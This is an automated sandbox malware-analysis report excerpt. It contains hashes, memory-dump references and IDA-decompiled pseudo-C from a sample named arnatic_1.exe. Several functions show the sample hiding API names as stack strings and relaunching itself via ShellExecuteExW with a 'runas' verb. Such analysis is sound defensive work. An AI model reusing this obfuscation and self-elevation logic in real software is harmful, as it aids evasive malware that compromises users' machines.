Opcode Fuzzy Hash: b9152af8a192fc4e4a201217e360f9288bbf3ac98fcb452379079d5eaee6a49a
Instruction Fuzzy Hash: 2111C4714047009FC7106F26D9812AABBD1EF41378F448A5FF4A4CB392D3BC88D18B96

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4A0, Relevance: 6.1, APIs: 4, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,00000000,0041A699), ref: 0041A4C7
RtlEnterCriticalSection.NTDLL ref: 0041A4F8

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: CriticalEnterSectionSleep
String ID:
API String ID: 3080175056-0
Opcode ID: e8a22f91c5f8b8480827c7b1dfeb35ffcb0b2bd39092587b6eacc33b718a86ad
Instruction ID: a2b62141072a09bc35676d972d90c7993de82340033485340f7c8e4ff3a1c854
Opcode Fuzzy Hash: e8a22f91c5f8b8480827c7b1dfeb35ffcb0b2bd39092587b6eacc33b718a86ad
Instruction Fuzzy Hash: DD11A7B55061408AD720EB2CE9C91AF37E0EB10360F1A0876D445C7351D7B8D8D5C7AF

Uniqueness

Uniqueness Score: -1.00%

Function 004014E0, Relevance: 6.0, APIs: 4, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 004014F0
LoadLibraryA.KERNEL32 ref: 00401506
6E815550.KERNEL32 ref: 00401525
6E815550.KERNEL32 ref: 00401537

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: E815550$HandleLibraryLoadModule
String ID:
API String ID: 499688457-0
Opcode ID: 344c3b720468a327a3660eb66a5aa4f11c382b2106a6ea913af2061363555b3e
Instruction ID: 8910a8906ffbbbc4378b403ff68f91773c20deee3d96af9c3a7849bafeaa030b
Opcode Fuzzy Hash: 344c3b720468a327a3660eb66a5aa4f11c382b2106a6ea913af2061363555b3e
Instruction Fuzzy Hash: E80192B48082909BC3407F78A94801EBFE4AA51395F05853FE9859B261D7B85488DB9F

Uniqueness

Uniqueness Score: -1.00%

Function 0040C990, Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 0040C99E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040CBF7,?,?,?,?,?,0040C258), ref: 0040C9C5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040CBF7,?,?,?,?,?,0040C258), ref: 0040C9CC
RtlLeaveCriticalSection.NTDLL ref: 0040C9EC

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: d7f95a24be472bf4e69cc40b868f168bfd7514cf81cc9cb5036f9ad194522c99
Instruction ID: 7a572db04aa2c59ad6076b2f3a6ae2c391facdbceecafe032968cb3ac82d2bd7
Opcode Fuzzy Hash: d7f95a24be472bf4e69cc40b868f168bfd7514cf81cc9cb5036f9ad194522c99
Instruction Fuzzy Hash: 0BF0C8B2504250CFC7107F79ECC451B7BA8EB54360F06017ADD845F355D738A805CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0041A4A0: Sleep.KERNEL32(?,?,?,00000000,0041A699), ref: 0041A4C7

RtlLeaveCriticalSection.NTDLL ref: 0041A5EE
malloc.MSVCRT ref: 0041A616

Strings

@eN, xrefs: 0041A64A, 0041A677

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: CriticalLeaveSectionSleepmalloc
String ID: @eN
API String ID: 1993596536-104179623
Opcode ID: 15b25b2533fbbf0206b7ccba994f925d2e139965b1c76af5187aa4f68b8194d6
Instruction ID: d3e7754f961564c833e9f1b3b8e6f688ee6bb950167800919f6290105770aee1
Opcode Fuzzy Hash: 15b25b2533fbbf0206b7ccba994f925d2e139965b1c76af5187aa4f68b8194d6
Instruction Fuzzy Hash: 8A11DAB1A012408FD710CF29EC847AB77E1EB54365F09813BD8518B395D774C895CB4A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: arnatic_1.exe PID: 5768 Parent PID: 6548 arnatic_1.exeCOMMON

Executed Functions

Function 00401E70, Relevance: 50.8, APIs: 6, Strings: 23, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401E70() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v24;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				_Unknown_base(*)()* _t40;
				intOrPtr* _t41;
				intOrPtr* _t45;
				intOrPtr _t46;
				intOrPtr _t48;

				_v108 = 0x52455355;
				_v104 = 0x3233;
				_v100 = 0x4e52454b;
				_v96 = 0x32334c45;
				_v92 = 0;
				 *0x40bab8 = LoadLibraryA( &_v100);
				_v76 = 0x776f6853;
				_v72 = 0x646e6957;
				_v68 = 0x776f;
				_v88 = 0x450054;
				_v84 = 0x50004d;
				_v80 = 0;
				if(GetEnvironmentVariableW( &_v88, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\", 0x104) > 0) {
					L2:
					_t40 = GetProcAddress(LoadLibraryA( &_v108),  &_v76);
					_t23 =  &_v64; // 0x776f6853
					 *0x40bedc = _t40;
					_v64 = 0x4d746547;
					_v60 = 0x6c75646f;
					_v56 = 0x6c694665;
					_v52 = 0x6d614e65;
					_v48 = 0x5765;
					_t41 = E00401000(_t23);
					if(_t41 != 0) {
						 *_t41(0, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\7zS4FBAB23D\\arnatic_1.exe", 0x208);
						_v56 = 0x43746547;
						_v52 = 0x6f736e6f;
						_v48 = 0x6957656c;
						_v44 = 0x776f646e;
						_v40 = 0;
						_t45 = E00401000( &_v56);
						if(_t45 != 0) {
							_t46 =  *_t45(); // executed
							 *0x40bed8 = _t46;
							E00401E20(L"C:\\Users\\hardz\\AppData\\Local\\Temp\\");
							_t48 =  *0x40babc; // 0x0
							if(_t48 != 0 || E00401890(L"C:\\Users\\hardz\\AppData\\Local\\Temp\\7zS4FBAB23D\\arnatic_1.exe", L"-a", 1) == 0) {
								E00401B60();
							}
						}
					}
					L7:
					return 0;
				}
				_v24 = 0x530055;
				_v20 = 0x520045;
				_v16 = 0x520050;
				_v12 = 0x46004f;
				_v8 = 0x4c0049;
				_v4 = 0x45;
				if(GetEnvironmentVariableW( &_v24, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\", 0x104) <= 0) {
					goto L7;
				}
				goto L2;
			}

0x00401e80
0x00401e88
0x00401e90
0x00401e98
0x00401ea0
0x00401ebf
0x00401ec4
0x00401ecc
0x00401ed4
0x00401edc
0x00401ee4
0x00401eec
0x00401ef8
0x00401f43
0x00401f50
0x00401f56
0x00401f5a
0x00401f60
0x00401f68
0x00401f70
0x00401f78
0x00401f80
0x00401f88
0x00401f92
0x00401fa4
0x00401faa
0x00401fb3
0x00401fbb
0x00401fc3
0x00401fcb
0x00401fd3
0x00401fdd
0x00401fdf
0x00401fe6
0x00401feb
0x00401ff0
0x00401ffa
0x00402014
0x00402014
0x00401ffa
0x00401fdd
0x0040201a
0x00402020
0x00402020
0x00401f09
0x00401f11
0x00401f19
0x00401f21
0x00401f29
0x00401f31
0x00401f3d
0x00000000
0x00000000
0x00000000

APIs

LoadLibraryA.KERNEL32 ref: 00401EA8
GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,C:\Users\user\AppData\Local\Temp\,00000104), ref: 00401EF4
GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,C:\Users\user\AppData\Local\Temp\,00000104), ref: 00401F39
LoadLibraryA.KERNEL32(?,00450054,?,?,?,?,?,?,?,C:\Users\user\AppData\Local\Temp\,00000104), ref: 00401F4D
GetProcAddress.KERNEL32(00000000), ref: 00401F50
GetConsoleWindow.KERNELBASE ref: 00401FDF

Strings

KERN, xrefs: 00401E90
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe, xrefs: 00401F9D, 00402003
32, xrefs: 00401E88
E, xrefs: 00401F11
eNam, xrefs: 00401F78
onso, xrefs: 00401FB3
EL32, xrefs: 00401E98
GetM, xrefs: 00401F60
eFil, xrefs: 00401F70
odul, xrefs: 00401F68
GetC, xrefs: 00401FAA
U, xrefs: 00401F09
M, xrefs: 00401EE4
T, xrefs: 00401EDC
E, xrefs: 00401F31
ndow, xrefs: 00401FC3
P, xrefs: 00401F19
O, xrefs: 00401F21
C:\Users\user\AppData\Local\Temp\, xrefs: 00401EB9, 00401F03, 00401FE1
leWi, xrefs: 00401FBB
I, xrefs: 00401F29
Show, xrefs: 00401F56, 00401F5F
USER, xrefs: 00401E80

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: EnvironmentLibraryLoadVariable$AddressConsoleProcWindow
String ID: 32$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe$E$E$EL32$GetC$GetM$I$KERN$M$O$P$Show$T$U$USER$eFil$eNam$leWi$ndow$odul$onso
API String ID: 3462473477-2890889186
Opcode ID: e720a3baf8efffcece8f97780cc9c5d22219416b4d57d81bc6b5fd17449fa833
Instruction ID: f6b5b9b2220cee2dc73ff8b38cf0e60f736821f7e6ed627921851a2cabfb4332
Opcode Fuzzy Hash: e720a3baf8efffcece8f97780cc9c5d22219416b4d57d81bc6b5fd17449fa833
Instruction Fuzzy Hash: F5415CB05083409BE350DF55D945B1BBBE4BF80748F10482DF698A62A1E7B8D648CF9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040419A, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040419A() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00404154); // executed
				 *0x40c0a0 = _t1;
				return _t1;
			}

0x0040419f
0x004041a5
0x004041aa

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00004154), ref: 0040419F

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e4a837e4421dfca35a180011e86389abb3002b2680ff48cfb8b0cc5d2a8c63fb
Instruction ID: 4375aa405fc3bc23bc8aae161aa1cfeb38e3d74e5fe5e8f1ab9eae7839bc8867
Opcode Fuzzy Hash: e4a837e4421dfca35a180011e86389abb3002b2680ff48cfb8b0cc5d2a8c63fb
Instruction Fuzzy Hash: 2EA002F4945245CFCB006FA0AF4D7853AE1B69470675003F6B612B53A5DB781284EA2F

Uniqueness

Uniqueness Score: -1.00%

Function 004041AC, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 004041B1

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 76027ef79962c9503139453e8671925e5a0dde2adb06339582793ec920188ace
Instruction ID: b37dd780e2dc070c81db983b9ba20dd3b12804ba3ecab195da2c652eadcce759
Opcode Fuzzy Hash: 76027ef79962c9503139453e8671925e5a0dde2adb06339582793ec920188ace
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00401890, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401890(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct _SHELLEXECUTEINFOW _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				struct HINSTANCE__* _t29;
				_Unknown_base(*)()* _t30;
				int _t36;
				char* _t47;

				_v76 = 0x6c656853;
				_v72 = 0x6578456c;
				_v68 = 0x65747563;
				_v64 = 0x577845;
				_v108 = 0x4c454853;
				_v104 = 0x32334c;
				_t29 = LoadLibraryA( &_v108);
				_t7 =  &_v76; // 0x6c656853
				_t30 = GetProcAddress(_t29, _t7);
				if(_t30 != 0) {
					_v88 = 0x70006f;
					_v84 = 0x6e0065;
					_v80 = 0;
					_v100 = 0x750072;
					_v96 = 0x61006e;
					_v92 = 0x73;
					_t47 =  &_v100;
					if(_a12 == 0) {
						_t47 =  &_v88;
					}
					memset( &(_v60.fMask), 0, 0xe << 2);
					_v60.lpParameters = _a8;
					_v60.cbSize = 0x3c;
					_v60.lpVerb = _t47;
					_v60.fMask = 0x440;
					_v60.nShow = 1;
					_v60.lpFile = _a4;
					_t36 = ShellExecuteExW( &_v60); // executed
					return _t36;
				} else {
					return _t30;
				}
			}

0x00401897
0x004018a0
0x004018a8
0x004018b0
0x004018b8
0x004018c0
0x004018c8
0x004018ce
0x004018d4
0x004018de
0x004018ec
0x004018f4
0x004018fc
0x00401904
0x0040190c
0x00401914
0x0040191c
0x00401920
0x00401922
0x00401922
0x00401931
0x0040193b
0x00401944
0x0040194c
0x00401950
0x00401958
0x00401960
0x00401964
0x0040196b
0x004018e3
0x004018e3
0x004018e3

APIs

LoadLibraryA.KERNEL32(?,?,00000000), ref: 004018C8
GetProcAddress.KERNEL32(00000000,Shel), ref: 004018D4
ShellExecuteExW.SHELL32(?,?,?,?,?,?,?,?,?,74E057B0,74E04CE0,?,?,00000000), ref: 00401964

Strings

o, xrefs: 004018EC
Shel, xrefs: 004018CE, 004018D2
L32, xrefs: 004018C0
lExe, xrefs: 004018A0
cute, xrefs: 004018A8
SHEL, xrefs: 004018B8
n, xrefs: 0040190C
ExW, xrefs: 004018B0
r, xrefs: 00401904
<, xrefs: 00401944
s, xrefs: 00401914

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: AddressExecuteLibraryLoadProcShell
String ID: <$ExW$L32$SHEL$Shel$cute$lExe$n$o$r$s
API String ID: 3429701994-1301878048
Opcode ID: ff51ac43f686f6a24aafd75e61d84af493e0d9102e1cbca8d32b7e9396254b80
Instruction ID: 332fc8652ea858dbcb415eb6dca09121fd48011a236b0f5d3356eb45f2750e14
Opcode Fuzzy Hash: ff51ac43f686f6a24aafd75e61d84af493e0d9102e1cbca8d32b7e9396254b80
Instruction Fuzzy Hash: 652113B59083419FE310CF11D44475BBBF5BBC8308F408A2DFA98A6220D7B5D6488F97

Uniqueness

Uniqueness Score: -1.00%

Function 00403A31, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00403A31() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00402837(0x480);
				if(_t89 == 0) {
					E00402654(0x1b);
				}
				 *0x40c4c0 = _t89;
				 *0x40c5c0 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x40c4c0; // 0x2090630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x40c4c0; // 0x2090630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x40c5c0);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x40c5c0 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x40c4c0[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x40c4c4;
					while(1) {
						_t69 = E00402837(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x40c5c0 =  *0x40c5c0 + 0x20;
						__eflags =  *0x40c5c0;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x40c5c0 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x40c5c0; // 0x20
					goto L18;
				}
			}

0x00403a44
0x00403a49
0x00403a4d
0x00403a52
0x00403a53
0x00403a59
0x00403a63
0x00403a63
0x00403a69
0x00403a6d
0x00403a71
0x00403a74
0x00403a78
0x00403a7c
0x00403a81
0x00403a84
0x00403a84
0x00403a8f
0x00403a95
0x00403a9a
0x00403b71
0x00403b71
0x00403b71
0x00403b73
0x00403b73
0x00403b79
0x00403b7c
0x00403b80
0x00403b83
0x00403bd2
0x00403bd2
0x00403bd2
0x00000000
0x00403bd2
0x00403b85
0x00403b87
0x00403b8b
0x00403b97
0x00403b99
0x00403b99
0x00403b8d
0x00403b8f
0x00403b8f
0x00403ba3
0x00403ba5
0x00403ba8
0x00403bc1
0x00403bc1
0x00403baa
0x00403bab
0x00403bb1
0x00403bb3
0x00000000
0x00000000
0x00403bb5
0x00403bba
0x00403bbc
0x00403bbf
0x00403bc7
0x00403bca
0x00403bcc
0x00403bcc
0x00000000
0x00403bca
0x00000000
0x00403bbf
0x00403bd6
0x00403bd6
0x00403bd7
0x00403bd7
0x00403bec
0x00403bec
0x00403aa0
0x00403aa3
0x00403aa5
0x00000000
0x00000000
0x00403aab
0x00403aad
0x00403ab3
0x00403abb
0x00403abd
0x00403abf
0x00403abf
0x00403ac1
0x00403ac7
0x00403b1f
0x00403b1f
0x00403b21
0x00403b23
0x00000000
0x00000000
0x00000000
0x00000000
0x00403b25
0x00403b25
0x00403b28
0x00403b2a
0x00403b2d
0x00000000
0x00000000
0x00403b2f
0x00403b31
0x00403b33
0x00000000
0x00000000
0x00403b35
0x00403b37
0x00403b44
0x00403b4b
0x00403b4b
0x00403b58
0x00403b60
0x00403b64
0x00000000
0x00403b64
0x00403b3a
0x00403b40
0x00403b42
0x00000000
0x00000000
0x00000000
0x00403b67
0x00403b67
0x00403b6b
0x00403b6c
0x00403b6d
0x00403b6d
0x00000000
0x00403ac9
0x00403ac9
0x00403ace
0x00403ad3
0x00403ad8
0x00403adb
0x00000000
0x00000000
0x00403add
0x00403add
0x00403ae4
0x00403ae6
0x00403ae6
0x00403aec
0x00403aec
0x00403aee
0x00000000
0x00000000
0x00403af0
0x00403af4
0x00403af7
0x00403afb
0x00403b01
0x00403b04
0x00403b04
0x00403b0c
0x00403b0f
0x00403b15
0x00000000
0x00000000
0x00000000
0x00403b17
0x00403b19
0x00000000
0x00403b19

APIs

GetStartupInfoA.KERNEL32(?), ref: 00403A8F
GetFileType.KERNEL32(00000480), ref: 00403B3A
GetStdHandle.KERNEL32(-000000F6), ref: 00403B9D
GetFileType.KERNELBASE(00000000), ref: 00403BAB
SetHandleCount.KERNEL32 ref: 00403BE2

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 322875ee759a8ee1641dbb1542f2d8c8c890303954751e691056356582af5588
Instruction ID: d023d1a66b1cbe6f0f61fc54852803eb6f4ee41480c9e5bfee2014eba04d3119
Opcode Fuzzy Hash: 322875ee759a8ee1641dbb1542f2d8c8c890303954751e691056356582af5588
Instruction Fuzzy Hash: 9651D631A14211CBC7208F28C984A667FF8BB5172DF24477ED596F72E2D738AA05C719

Uniqueness

Uniqueness Score: -1.00%

Function 004033B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E004033B0(void* __esi, char _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E00403455();
